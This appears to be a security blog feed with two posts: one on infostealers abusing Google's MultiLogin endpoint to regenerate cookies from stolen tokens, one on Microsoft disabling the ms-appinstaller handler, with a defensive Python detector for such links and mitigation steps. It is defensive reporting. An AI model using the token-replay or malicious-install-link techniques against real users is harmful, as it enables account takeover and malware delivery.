In October 2023, a malware developer described the flaw and an exploit for it on their Telegram channel. The exploit's distinguishing feature was generating persistent Google cookies from a stolen token, so that access survived a password reset. Its potential did not go unnoticed.

Screenshot: a threat actor announces the 0-day exploit on their Telegram channel.

Lumma infostealer was the first to integrate the exploit, in November 2023, "blackboxing" its implementation to protect the method. Other stealers followed quickly: Rhadamanthys, Stealc, Meduza, Risepro and WhiteSnake implemented it, each with its own variations, which shows how fast a working technique spreads through the infostealer ecosystem.

Hidden Tactics

The core of the exploit is the token:GAIA ID pair, which Google's sign-in uses to tie a refresh token to an account. Replaying the pair against MultiLogin regenerates Google service cookies and keeps unauthorized access to the account. Lumma encrypted this pair with its own private keys before sending it to its C2, the "blackboxing" mentioned above, which hid the core mechanics of the exploit and made it harder for competing malware authors to copy the method.

Because the stolen pairs travelled encrypted between the infected host, the C2 and the MultiLogin endpoint, and because the endpoint itself is a legitimate Google host reached over TLS, network security tools had little to distinguish this from ordinary Google traffic.

Interim Measures for Protection

While Google is working on a fix, there are immediate steps you can take. Sign out of every browser profile on the affected device (or remotely revoke the session from the device activity page of your Google Account); this is the step that matters, because it invalidates the refresh tokens stored there, whereas a password change alone does not. Then change your password and sign in again to obtain new tokens. If tokens and GAIA IDs were already stolen, the old tokens are now useless to the attacker.

Microsoft Disables MSIX App Installer Protocol
https://gridinsoft.com/blogs/microsoft-disables-msix-app-installer-protocol/
Tue, 02 Jan 2024 09:38:57 +0000

Microsoft has disabled the ms-appinstaller protocol handler by default in Windows after its abuse in real-world cyberattacks. Attackers were misusing the handler to install malware while evading anti-malware detection.

MSIX Installer Protocol Exploited

A market for malware kits that abuse the MSIX packaging format and the ms-appinstaller protocol handler is nothing new. In this case, a kit sold as a service lets attackers abuse the handler (the weakness Microsoft tracks as CVE-2021-43890) to distribute malware, including ransomware.

As a reminder, MSIX is a Windows application packaging format (Windows 10 and later). Each package carries an XML manifest (AppxManifest.xml) in which developers describe how deployment works, which files are needed and where they come from. The root of the problem is that MSIX packages can be installed straight from the Internet through the ms-appinstaller protocol handler: a link of the form ms-appinstaller:?source=//website.com/file.appx hands the URL to App Installer, which fetches the package and starts the installation, so a malicious link is all it takes to trigger a malware install.
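The following Python snippet is an added example (not from the post or from Microsoft) for spotting such links in mail bodies, proxy logs or saved landing pages and resolving the package URL they point to, which is the indicator worth blocking. The sample text is constructed; example.invalid is a placeholder host, and treating a scheme-relative //host source as HTTPS is an assumption made for triage purposes.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Package formats App Installer will fetch and install from a source URL.
PACKAGE_EXTS = (".msix", ".msixbundle", ".appx", ".appxbundle", ".appinstaller")

# An ms-appinstaller: link runs until whitespace, a quote or an angle bracket.
LINK_RE = re.compile(r"ms-appinstaller:\?[^\s\"'<>]+", re.IGNORECASE)

# Constructed sample text (not real indicators); example.invalid is a placeholder host.
SAMPLE_TEXT = """
Get the update: ms-appinstaller:?source=https://example.invalid/Setup/TeamsInstaller.msix
<a href="ms-appinstaller:?source=//example.invalid/pkg/Updater.appxbundle">Install</a>
Documentation: https://example.invalid/docs/index.html
Encoded: ms-appinstaller:?source=https%3A%2F%2Fexample.invalid%2Fx%2Fapp.appinstaller
"""


def parse_appinstaller_link(link: str) -> dict:
    """Resolve the 'source' parameter of an ms-appinstaller: link to the package URL."""
    query = link.split("?", 1)[1] if "?" in link else ""
    source = parse_qs(query).get("source", [""])[0]   # parse_qs already percent-decodes
    if source.startswith("//"):
        # Scheme-relative form as in the post's example; assumed to resolve over HTTPS.
        source = "https:" + source
    parts = urlsplit(source)
    return {
        "link": link,
        "source": source,
        "host": parts.hostname or "",
        "is_package": parts.path.lower().endswith(PACKAGE_EXTS),
    }


def find_appinstaller_links(text: str) -> list[dict]:
    """Extract and resolve every ms-appinstaller: link in a blob of text."""
    return [parse_appinstaller_link(m.group(0)) for m in LINK_RE.finditer(text)]


def triage(text: str) -> list[str]:
    """One line per link, ready for a blocklist or an alert."""
    return [
        f"{r['host']} -> {r['source']} ({'package' if r['is_package'] else 'non-package'})"
        for r in find_appinstaller_links(text)
    ]


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_TEXT)))
```

Ordinary https:// links to the same host are left alone on purpose: the protocol handler, not the hosting site, is what bypasses the browser's download checks, so the ms-appinstaller: prefix is the signal.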

Screenshot: attack chain using App Installer.

As for the modus operandi, the attackers used signed malicious MSIX packages disguised as legitimate software. Distribution channels in this campaign included Microsoft Teams messages and malicious advertisements on popular search engines. Because App Installer fetches the package itself and the package carries a valid signature, the lure sidesteps protections such as Microsoft Defender SmartScreen and the browser's download warnings, making the attacks harder to detect and block.

Multiple groups have been observed abusing the App Installer service since mid-November 2023, using fake installers and landing pages among other techniques. Microsoft names Storm-0569, Storm-1113, Sangria Tempest and Storm-1674.

Microsoft Blocks MSIX Installer

This is not the first time Microsoft has faced abuse of this installation path. In February 2022, it disabled the protocol handler after Emotet, TrickBot and BazaLoader abused it. The weakness used then was slightly different, but the effect was nearly the same: drive-by malware installation.

This time, Microsoft recommends installing App Installer version 1.21.3421.0 or later, which disables the ms-appinstaller protocol handler by default and so removes the abuse path. Administrators who cannot update immediately can disable the protocol via Group Policy by setting EnableMSAppInstallerProtocol to Disabled.

Is This Vulnerability Dangerous?

It is, and the list of threat actors exploiting it makes that clear. In most observed cases it delivers backdoors and RATs, which open the door to further payloads. Although the current attacks target mostly corporations, nothing prevents criminals from using the same lure against home users.

To stay protected against such attacks, install the latest patches and keep an eye on security news; critical vulnerabilities like this one almost always make the headlines.

As a layer of reactive protection, I can recommend an advanced security solution. Signature-based detection struggles with these packages because they are signed with legitimately issued, if misused, code-signing certificates, but the malware is comparatively easy to catch at run time with a heuristic detection system. GridinSoft Anti-Malware is a solution that can provide this kind of protection.
